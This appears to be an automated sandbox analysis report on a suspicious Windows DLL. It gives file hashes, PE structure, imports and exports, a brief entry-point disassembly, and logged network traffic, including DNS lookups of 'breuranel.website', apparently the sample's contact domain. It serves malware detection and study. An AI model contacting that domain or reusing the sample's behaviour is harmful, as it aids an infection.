                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206273" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERF908.tmp.WERInternalMetadata.xml
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8410
                                                                                                                                  Entropy (8bit):3.6958658798372173
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:Rrl7r3GLNi9W6n0V6YoL6AIcgmf8wSjCprx89b2KsfMSm:RrlsNiM60V6YE6Argmf8wSl2pfI
                                                                                                                                  MD5:838AE79F4556503BDCE9A7ABD1907FE8
                                                                                                                                  SHA1:3728B41896A703AE2DD703E69FB9CF08354FA78A
                                                                                                                                  SHA-256:20AB74B222F0158178B22A8A946B372A94B5577FBFB08B0D785FDB863FACB58F
                                                                                                                                  SHA-512:3EDA37BC7BBECA1AB15941CBA7360BB112999D9BFEF0CFABD9FCEC8D9B5AFFF5A04D9F3B193E728835902E09E035655DFCB9F1810E47C67B186DCDAFBF26740C
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.5.2.<./.P.i.d.>.......
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE2A.tmp.xml
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4771
                                                                                                                                  Entropy (8bit):4.486211559507188
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwSD8zs1JgtWI9J1WSC8Bw8fm8M4JCdsqMFO+q8vjsqq4SrS9d:uITfPCESN/JE7K3qDW9d
                                                                                                                                  MD5:9B1980148D8913011A5202FC1293B9DC
                                                                                                                                  SHA1:264F234A834B74B10F8A46D0645C4514F91703B5
                                                                                                                                  SHA-256:6819D2AEB47EDE2E96339477CBC46A4E5FFB07836215215F39B0AE302D85C1AD
                                                                                                                                  SHA-512:D795F717C104F03B2D04BC8CB0ADFAACD1E3ACF9F8B6C66CBF98736269C0DDEF1F2E99C26E3987172FCF7096C41D502336C6B68B089762D59BEED96E0AC9BB8A
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206273" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Entropy (8bit):6.669953219927633
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:m87xfb63XU.dll
                                                                                                                                  File size:718336
                                                                                                                                  MD5:5aa733e108f0fa41df88cea0a309affe
                                                                                                                                  SHA1:ce79918ca7845f2163360ea40a251912998ea226
                                                                                                                                  SHA256:1be687a0453f23ea53b94a4447c926a9b4b6e01c2788e641b76eb4a5215bd960
                                                                                                                                  SHA512:e18ef98a6bb007ee0ef473cd05bad85ac2f177d316981658e17a12f182effbcc98754fbefc362a4212a8eebcc71fc2e2a15c865b08c50f5990223bcb55d001af
                                                                                                                                  SSDEEP:12288:VUAQSxn6fDEr8Np6b/rPPsjosrS9aEoe+0JCym+4YJAOSVUNcuHIGF4uW/XrGAsR:Vz3xn6fq8Np6bTPPaBreaZlYCOSVol2u
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}.W.}.W.}.Wy..W.}.W..}W.}.W...V.}.W...V.}.W...V.}.Wy..W.}.W.}.WH|.W...VK}.W...V.}.W...V.}.W.}qW.}.W...V.}.WRich.}.W.......

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:74f0e4ecccdce0e4

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x1003ab77
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x10000000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                  Time Stamp:0x5F6FCA4E [Sat Sep 26 23:10:06 2020 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:6
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:6
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:6
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:b5c6badd398e2e3aa283a40a40432c6c

                                                                                                                                  Entrypoint Preview

                                                                                                                                  Instruction
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  cmp dword ptr [ebp+0Ch], 01h
                                                                                                                                  jne 00007FEDB4CF5BC7h
                                                                                                                                  call 00007FEDB4CF66B2h
                                                                                                                                  push dword ptr [ebp+10h]
                                                                                                                                  push dword ptr [ebp+0Ch]
                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                  call 00007FEDB4CF5A6Ah
                                                                                                                                  add esp, 0Ch
                                                                                                                                  pop ebp
                                                                                                                                  retn 000Ch
                                                                                                                                  mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                  mov dword ptr fs:[00000000h], ecx
                                                                                                                                  pop ecx
                                                                                                                                  pop edi
                                                                                                                                  pop edi
                                                                                                                                  pop esi
                                                                                                                                  pop ebx
                                                                                                                                  mov esp, ebp
                                                                                                                                  pop ebp
                                                                                                                                  push ecx
                                                                                                                                  ret
                                                                                                                                  mov ecx, dword ptr [ebp-10h]
                                                                                                                                  xor ecx, ebp
                                                                                                                                  call 00007FEDB4CF57C3h
                                                                                                                                  jmp 00007FEDB4CF5BA0h
                                                                                                                                  mov ecx, dword ptr [ebp-14h]
                                                                                                                                  xor ecx, ebp
                                                                                                                                  call 00007FEDB4CF57B2h
                                                                                                                                  jmp 00007FEDB4CF5B8Fh
                                                                                                                                  push eax
                                                                                                                                  push dword ptr fs:[00000000h]
                                                                                                                                  lea eax, dword ptr [esp+0Ch]
                                                                                                                                  sub esp, dword ptr [esp+0Ch]
                                                                                                                                  push ebx
                                                                                                                                  push esi
                                                                                                                                  push edi
                                                                                                                                  mov dword ptr [eax], ebp
                                                                                                                                  mov ebp, eax
                                                                                                                                  mov eax, dword ptr [100AA0D4h]
                                                                                                                                  xor eax, ebp
                                                                                                                                  push eax
                                                                                                                                  push dword ptr [ebp-04h]
                                                                                                                                  mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                                  mov dword ptr fs:[00000000h], eax
                                                                                                                                  ret
                                                                                                                                  push eax
                                                                                                                                  push dword ptr fs:[00000000h]
                                                                                                                                  lea eax, dword ptr [esp+0Ch]
                                                                                                                                  sub esp, dword ptr [esp+0Ch]
                                                                                                                                  push ebx
                                                                                                                                  push esi
                                                                                                                                  push edi
                                                                                                                                  mov dword ptr [eax], ebp
                                                                                                                                  mov ebp, eax
                                                                                                                                  mov eax, dword ptr [100AA0D4h]
                                                                                                                                  xor eax, ebp
                                                                                                                                  push eax
                                                                                                                                  mov dword ptr [ebp-10h], eax
                                                                                                                                  push dword ptr [ebp-04h]
                                                                                                                                  mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                                  mov dword ptr fs:[00000000h], eax
                                                                                                                                  ret
                                                                                                                                  push eax
                                                                                                                                  inc dword ptr fs:[eax]

                                                                                                                                  Data Directories

Name                                   Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT           0xa8990          0x80          .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT           0xa8a10          0x50          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE         0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY         0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC        0x146000         0x53d0        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG            0xa474c          0x54          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS              0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0xa47a0          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT              0x7b000          0x1fc         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED         0x0              0x0

                                                                                                                                  Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x79f71       0x7a000   False     0.510071801358   data       6.7546243609   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x7b000          0x2e586       0x2e600   False     0.556366871631   data       5.60179729877  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xaa000          0x9b19c       0x1800    False     0.190266927083   data       4.15778005426  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc  0x146000         0x53d0        0x5400    False     0.752650669643   data       6.72453697464  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                  Imports

DLL           Import
KERNEL32.dll  LockResource, FreeLibrary, GetProcAddress, VirtualProtect, OpenProcess, GetCurrentThreadId, Sleep, GetSystemTime, CreateSemaphoreW, LoadLibraryW, GetModuleFileNameW, GetModuleHandleW, GetTempPathW, CreateFileW, GetVolumeInformationW, QueryPerformanceCounter, GetVersionExW, GetDateFormatW, OutputDebugStringW, CloseHandle, ReadConsoleW, ReadFile, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, SetFilePointerEx, GetFileSizeEx, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetFileType, GetStdHandle, HeapReAlloc, HeapFree, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WideCharToMultiByte, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, LoadLibraryExW, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapAlloc, GetTimeZoneInformation, GetTimeFormatW, WriteConsoleW
USER32.dll    CreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW, GetPropW
MSACM32.dll   acmDriverClose, acmFormatChooseW, acmFilterDetailsW, acmFilterEnumW, acmDriverEnum, acmDriverPriority, acmFormatEnumW, acmFilterTagEnumW, acmFormatTagDetailsW, acmDriverMessage, acmFormatSuggest, acmFilterTagDetailsW, acmFormatTagEnumW, acmFilterChooseW, acmDriverOpen, acmDriverDetailsW, acmFormatDetailsW, acmMetrics, acmDriverAddW, acmDriverRemove, acmDriverID, acmGetVersion

                                                                                                                                  Exports

Name        Ordinal  Address
BeGrass     1        0x10016020
Fieldeight  2        0x100162f0
Often       3        0x10016510
Townenter   4        0x100167a0

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Oct 12, 2021 00:22:57.520787001 CEST  49782        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:22:57.520829916 CEST  443          49782      13.82.28.61    192.168.2.3
Oct 12, 2021 00:22:57.520929098 CEST  49782        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:22:57.525758028 CEST  49782        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:22:57.525798082 CEST  443          49782      13.82.28.61    192.168.2.3
Oct 12, 2021 00:22:57.851005077 CEST  443          49782      13.82.28.61    192.168.2.3
Oct 12, 2021 00:22:57.851192951 CEST  49782        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:22:58.030530930 CEST  49782        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:22:58.030558109 CEST  443          49782      13.82.28.61    192.168.2.3
Oct 12, 2021 00:22:58.030838013 CEST  443          49782      13.82.28.61    192.168.2.3
Oct 12, 2021 00:22:58.079046965 CEST  49782        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:22:58.731570959 CEST  49782        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:22:58.775145054 CEST  443          49782      13.82.28.61    192.168.2.3
Oct 12, 2021 00:22:58.847104073 CEST  443          49782      13.82.28.61    192.168.2.3
Oct 12, 2021 00:22:58.847203970 CEST  443          49782      13.82.28.61    192.168.2.3
Oct 12, 2021 00:22:58.847284079 CEST  49782        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:22:58.850059986 CEST  49782        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:22:58.850096941 CEST  443          49782      13.82.28.61    192.168.2.3
Oct 12, 2021 00:22:58.850153923 CEST  49782        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:22:58.850167036 CEST  443          49782      13.82.28.61    192.168.2.3
Oct 12, 2021 00:23:00.772372007 CEST  49784        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:23:00.772422075 CEST  443          49784      13.82.28.61    192.168.2.3
Oct 12, 2021 00:23:00.772546053 CEST  49784        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:23:00.779629946 CEST  49784        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:23:00.779653072 CEST  443          49784      13.82.28.61    192.168.2.3
Oct 12, 2021 00:23:01.090356112 CEST  443          49784      13.82.28.61    192.168.2.3
Oct 12, 2021 00:23:01.090495110 CEST  49784        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:23:01.096784115 CEST  49784        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:23:01.096807003 CEST  443          49784      13.82.28.61    192.168.2.3
Oct 12, 2021 00:23:01.097215891 CEST  443          49784      13.82.28.61    192.168.2.3
Oct 12, 2021 00:23:01.303193092 CEST  443          49784      13.82.28.61    192.168.2.3
Oct 12, 2021 00:23:01.303283930 CEST  49784        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:23:01.875718117 CEST  49784        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:23:01.919132948 CEST  443          49784      13.82.28.61    192.168.2.3
Oct 12, 2021 00:23:01.993288040 CEST  443          49784      13.82.28.61    192.168.2.3
Oct 12, 2021 00:23:01.994883060 CEST  443          49784      13.82.28.61    192.168.2.3
Oct 12, 2021 00:23:01.996520996 CEST  49784        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:23:01.999001980 CEST  49784        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:23:01.999062061 CEST  443          49784      13.82.28.61    192.168.2.3
Oct 12, 2021 00:23:01.999078035 CEST  49784        443        192.168.2.3    13.82.28.61
Oct 12, 2021 00:23:01.999088049 CEST  443          49784      13.82.28.61    192.168.2.3
Oct 12, 2021 00:23:42.175909996 CEST  49793        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:23:42.175944090 CEST  443          49793      40.97.161.50   192.168.2.3
Oct 12, 2021 00:23:42.179888010 CEST  49793        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:23:42.180819035 CEST  49793        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:23:42.180844069 CEST  443          49793      40.97.161.50   192.168.2.3
Oct 12, 2021 00:23:42.696980000 CEST  443          49793      40.97.161.50   192.168.2.3
Oct 12, 2021 00:23:42.696993113 CEST  443          49793      40.97.161.50   192.168.2.3
Oct 12, 2021 00:23:42.697113037 CEST  49793        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:23:42.699634075 CEST  49793        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:23:42.699645042 CEST  443          49793      40.97.161.50   192.168.2.3
Oct 12, 2021 00:23:42.699872971 CEST  443          49793      40.97.161.50   192.168.2.3
Oct 12, 2021 00:23:42.701802969 CEST  49793        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:23:42.743133068 CEST  443          49793      40.97.161.50   192.168.2.3
Oct 12, 2021 00:23:42.872004032 CEST  443          49793      40.97.161.50   192.168.2.3
Oct 12, 2021 00:23:42.872066021 CEST  443          49793      40.97.161.50   192.168.2.3
Oct 12, 2021 00:23:42.872133970 CEST  49793        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:23:42.872306108 CEST  49793        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:23:42.872328997 CEST  443          49793      40.97.161.50   192.168.2.3
Oct 12, 2021 00:23:42.898372889 CEST  49794        443        192.168.2.3    40.101.60.226
Oct 12, 2021 00:23:42.898422956 CEST  443          49794      40.101.60.226  192.168.2.3
Oct 12, 2021 00:23:42.898514032 CEST  49794        443        192.168.2.3    40.101.60.226
Oct 12, 2021 00:23:42.899671078 CEST  49794        443        192.168.2.3    40.101.60.226
Oct 12, 2021 00:23:42.899688959 CEST  443          49794      40.101.60.226  192.168.2.3
Oct 12, 2021 00:23:42.995965958 CEST  443          49794      40.101.60.226  192.168.2.3
Oct 12, 2021 00:23:42.996115923 CEST  49794        443        192.168.2.3    40.101.60.226
Oct 12, 2021 00:23:42.999381065 CEST  49794        443        192.168.2.3    40.101.60.226
Oct 12, 2021 00:23:42.999392986 CEST  443          49794      40.101.60.226  192.168.2.3
Oct 12, 2021 00:23:42.999603033 CEST  443          49794      40.101.60.226  192.168.2.3
Oct 12, 2021 00:23:43.002351999 CEST  49794        443        192.168.2.3    40.101.60.226
Oct 12, 2021 00:23:43.031394005 CEST  443          49794      40.101.60.226  192.168.2.3
Oct 12, 2021 00:23:43.031452894 CEST  443          49794      40.101.60.226  192.168.2.3
Oct 12, 2021 00:23:43.031641960 CEST  49794        443        192.168.2.3    40.101.60.226
Oct 12, 2021 00:23:43.031821012 CEST  49794        443        192.168.2.3    40.101.60.226
Oct 12, 2021 00:23:43.031841040 CEST  443          49794      40.101.60.226  192.168.2.3
Oct 12, 2021 00:23:43.031909943 CEST  49794        443        192.168.2.3    40.101.60.226
Oct 12, 2021 00:23:43.031922102 CEST  443          49794      40.101.60.226  192.168.2.3
Oct 12, 2021 00:23:43.059236050 CEST  49795        443        192.168.2.3    52.97.151.82
Oct 12, 2021 00:23:43.059287071 CEST  443          49795      52.97.151.82   192.168.2.3
Oct 12, 2021 00:23:43.059429884 CEST  49795        443        192.168.2.3    52.97.151.82
Oct 12, 2021 00:23:43.060195923 CEST  49795        443        192.168.2.3    52.97.151.82
Oct 12, 2021 00:23:43.060220003 CEST  443          49795      52.97.151.82   192.168.2.3
Oct 12, 2021 00:23:43.161293983 CEST  443          49795      52.97.151.82   192.168.2.3
Oct 12, 2021 00:23:43.161458969 CEST  49795        443        192.168.2.3    52.97.151.82
Oct 12, 2021 00:23:43.165437937 CEST  49795        443        192.168.2.3    52.97.151.82
Oct 12, 2021 00:23:43.165457964 CEST  443          49795      52.97.151.82   192.168.2.3
Oct 12, 2021 00:23:43.165863991 CEST  443          49795      52.97.151.82   192.168.2.3
Oct 12, 2021 00:23:43.168822050 CEST  49795        443        192.168.2.3    52.97.151.82
Oct 12, 2021 00:23:43.210756063 CEST  443          49795      52.97.151.82   192.168.2.3
Oct 12, 2021 00:23:43.210839033 CEST  443          49795      52.97.151.82   192.168.2.3
Oct 12, 2021 00:23:43.211075068 CEST  49795        443        192.168.2.3    52.97.151.82
Oct 12, 2021 00:23:43.214827061 CEST  49795        443        192.168.2.3    52.97.151.82
Oct 12, 2021 00:23:43.214859009 CEST  443          49795      52.97.151.82   192.168.2.3
Oct 12, 2021 00:23:43.214894056 CEST  49795        443        192.168.2.3    52.97.151.82
Oct 12, 2021 00:23:43.214901924 CEST  443          49795      52.97.151.82   192.168.2.3
Oct 12, 2021 00:23:43.736807108 CEST  49796        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:23:43.736841917 CEST  443          49796      40.97.161.50   192.168.2.3
Oct 12, 2021 00:23:43.736911058 CEST  49796        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:23:43.737413883 CEST  49796        443        192.168.2.3    40.97.161.50
Oct 12, 2021 00:23:43.737438917 CEST  443          49796      40.97.161.50   192.168.2.3

UDP Packets

Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Oct 12, 2021 00:22:57.489255905 CEST  58361        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:22:57.508589983 CEST  53           58361      8.8.8.8        192.168.2.3
Oct 12, 2021 00:22:58.864429951 CEST  53615        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:23:00.653105021 CEST  50728        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:23:00.670943022 CEST  53           50728      8.8.8.8        192.168.2.3
Oct 12, 2021 00:23:02.003659964 CEST  53777        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:23:22.031254053 CEST  58058        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:23:22.051481009 CEST  53           58058      8.8.8.8        192.168.2.3
Oct 12, 2021 00:23:23.253137112 CEST  51539        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:23:23.273200989 CEST  53           51539      8.8.8.8        192.168.2.3
Oct 12, 2021 00:23:42.152149916 CEST  50585        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:23:42.171742916 CEST  53           50585      8.8.8.8        192.168.2.3
Oct 12, 2021 00:23:42.878056049 CEST  63456        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:23:42.896547079 CEST  53           63456      8.8.8.8        192.168.2.3
Oct 12, 2021 00:23:43.037961006 CEST  58540        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:23:43.057368040 CEST  53           58540      8.8.8.8        192.168.2.3
Oct 12, 2021 00:23:43.714478016 CEST  55108        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:23:43.735552073 CEST  53           55108      8.8.8.8        192.168.2.3
Oct 12, 2021 00:23:44.434165001 CEST  58942        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:23:44.454426050 CEST  53           58942      8.8.8.8        192.168.2.3
Oct 12, 2021 00:23:44.615155935 CEST  64432        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:23:44.635159016 CEST  53           64432      8.8.8.8        192.168.2.3
Oct 12, 2021 00:24:03.351385117 CEST  53465        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:24:03.371390104 CEST  53           53465      8.8.8.8        192.168.2.3
Oct 12, 2021 00:24:05.052063942 CEST  49290        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:24:05.071163893 CEST  53           49290      8.8.8.8        192.168.2.3
Oct 12, 2021 00:24:23.429223061 CEST  59754        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:24:23.444994926 CEST  53           59754      8.8.8.8        192.168.2.3
Oct 12, 2021 00:24:23.893990040 CEST  49234        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:24:25.331037045 CEST  58720        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:24:25.348794937 CEST  53           58720      8.8.8.8        192.168.2.3
Oct 12, 2021 00:24:25.828843117 CEST  57447        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:24:44.160267115 CEST  64099        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:24:44.179295063 CEST  53           64099      8.8.8.8        192.168.2.3
Oct 12, 2021 00:24:46.356193066 CEST  64610        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:24:46.375221014 CEST  53           64610      8.8.8.8        192.168.2.3
Oct 12, 2021 00:25:04.193835020 CEST  51989        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:25:04.212004900 CEST  53           51989      8.8.8.8        192.168.2.3
Oct 12, 2021 00:25:06.399404049 CEST  53152        53         192.168.2.3    8.8.8.8
Oct 12, 2021 00:25:06.417855024 CEST  53           53152      8.8.8.8        192.168.2.3

DNS Queries

Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                   Type            Class
Oct 12, 2021 00:22:57.489255905 CEST  192.168.2.3  8.8.8.8  0x6f46    Standard query (0)  msn.com                A (IP address)  IN (0x0001)
Oct 12, 2021 00:22:58.864429951 CEST  192.168.2.3  8.8.8.8  0xcb60    Standard query (0)  www.msn.com            A (IP address)  IN (0x0001)
Oct 12, 2021 00:23:00.653105021 CEST  192.168.2.3  8.8.8.8  0xfc91    Standard query (0)  msn.com                A (IP address)  IN (0x0001)
Oct 12, 2021 00:23:02.003659964 CEST  192.168.2.3  8.8.8.8  0x9592    Standard query (0)  www.msn.com            A (IP address)  IN (0x0001)
Oct 12, 2021 00:23:22.031254053 CEST  192.168.2.3  8.8.8.8  0x71b2    Standard query (0)  breuranel.website      A (IP address)  IN (0x0001)
Oct 12, 2021 00:23:23.253137112 CEST  192.168.2.3  8.8.8.8  0xc440    Standard query (0)  breuranel.website      A (IP address)  IN (0x0001)
